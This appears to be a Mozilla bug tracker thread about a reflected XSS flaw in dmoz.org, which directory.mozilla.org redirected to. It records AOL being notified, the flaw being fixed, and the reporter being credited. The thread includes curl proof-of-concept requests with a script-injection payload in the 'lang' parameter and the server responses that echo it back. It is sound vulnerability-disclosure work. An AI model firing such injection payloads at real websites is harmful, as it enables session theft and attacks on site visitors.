example xss in directory.mozilla.org

RESOLVED FIXED

Status

RESOLVED FIXED
2 years ago
2 years ago

People

(Reporter: honcbb, Unassigned)

Tracking

({sec-moderate, wsec-xss})

unspecified
sec-moderate, wsec-xss
Bug Flags:
sec-bounty -

Details

(Whiteboard: [reporter-external] [web-bounty-form] [verif?], URL)

Attachments

(2 attachments)

# directory.mozilla.org redirects to www.dmoz.org
$ curl -i directory.mozilla.org
HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: pp-web03
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 09 Jan 2017 14:28:13 GMT
Location: http://www.dmoz.org/
X-Cache-Info: not cacheable; response is 302 without expiry time
Content-Length: 204

# Results in a reflected XSS payload like so...
$ curl -i 'http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 14:29:51 GMT
Server: Apache
...SNIP...
Content-Language: en-US
Content-Length: 9330
Connection: close
Content-Type: text/html;charset=UTF-8

...SNIP...
      <input type="hidden" name="lang" value=en"><script>alert(document.domain)</script> ></input>
...SNIP...
Status: UNCONFIRMED → NEW
Ever confirmed: true
Created attachment 8825037 [details]
Screen Shot 2017-01-09 at 9.31.53 AM.png
This is a valid relfected XSS payload for this site.  There is a login for the page, but I'm not sure whether we have a large number of users visiting the site.  Setting the severity to moderate for the time being.
Keywords: sec-moderate, wsec-xss

Comment 4

2 years ago
Is this a Mozilla site?  I know we redirect there, but I believe it's owned and operated by AOL.
It was once known as directory.mozilla.org but it's owned by AOL, it's not ours. April's right. 

The XSS works through the redirect as well. 

Given that we don't control the site, I'm not sure we should be 302-ing to it given possible reputational risk . We all know the technical risks but this is a policy question we should probably kick to the bounty meeting. 

$ curl -i "http://directory.mozilla.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: pp-web01
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 09 Jan 2017 16:38:38 GMT
Location: http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
X-Cache-Info: not cacheable; response is 302 without expiry time
Content-Length: 312

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.dmoz.org/public/abuse?t=arts&amp;cat=Arts/Television&amp;lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E">here</a>.</p>
</body></html>
This is not our site, we might take away the redirect and alert security@aol.com to let them know about this issue.
Flags: sec-bounty? → sec-bounty-
:fox2mike - would it be possible to get stats on how many DNS queries we get for directory.mozilla.org? Trying to establish a metric to suggest whether it's in use or not since it redirects to a site operated by AOL.

Also, I'm sending AOL security an email now to alert them of the reflected XSS.
Flags: needinfo?(smani)
AOL Security team has responded and confirmed the XSS issue on their end and are working with their internal teams to resolve.  If they provide any other updates, I'll capture them in this bug.

Honc: in case it wasn't clear earlier, I credited you in the email I sent to AOL Security in case they would like to offer you a bounty or HoF mention.  Thanks again for the report!
(Reporter)

Comment 9

2 years ago
OK Very Thanks you
(Reporter)

Comment 10

2 years ago
Because I was through the Google search engine "site:*.Mozilla.org" imported into directory.Mozilla.org 302 into http://www.DMOZ.org/
(Reporter)

Comment 11

2 years ago
I find that this vulnerability has been fixed, does the team have any response?
I have confirmed the original PoC for the XSS issue appears to have been fixed by AOLs security team.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → FIXED
(Reporter)

Comment 13

2 years ago
ok Thanks
(Reporter)

Comment 14

2 years ago
Hey Mozila Firefox Security Team

Ask again!

After how long this problem has been patched, AOL team says any reward?
Honc: I'll CC you into the email thread with AOL so you can ask them about a bounty.
(Reporter)

Comment 16

2 years ago
ok , Thanks you
Honc was acknowledged on AOL's Security Hall of Fame for this issue:

https://contact.security.aol.com/hof/
Group: websites-security
Flags: needinfo?(smani)
(Reporter)

Comment 18

2 years ago
OK,i know,Very Thanks you~
You need to log in before you can comment on or make changes to this bug.